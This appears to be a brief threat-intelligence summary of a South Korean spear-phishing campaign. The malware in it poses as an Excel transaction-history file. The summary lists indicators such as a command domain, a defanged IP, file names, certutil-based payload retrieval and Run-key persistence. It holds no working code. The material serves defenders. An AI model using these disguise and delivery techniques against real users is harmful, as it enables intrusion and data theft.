ESRC observed a spear-phishing campaign in South Korea that sent malware disguised as a company transaction-history Excel document. The executable used a double-extension filename and an Excel-style icon to hide its .exe nature, then displayed a decoy spreadsheet while contacting 071790.000webhostapp.com to retrieve batch commands. The infection chain used certutil to download and decode CAB payloads, installed files including install.bat, spoolsve.exe, and winniet.ini, and configured persistence through a Run registry value. The malware attempted to connect to 111[.]90[.]138[.]41, with ESRC noting overlaps with tactics associated with suspected state-sponsored activity but not assigning a firm actor attribution.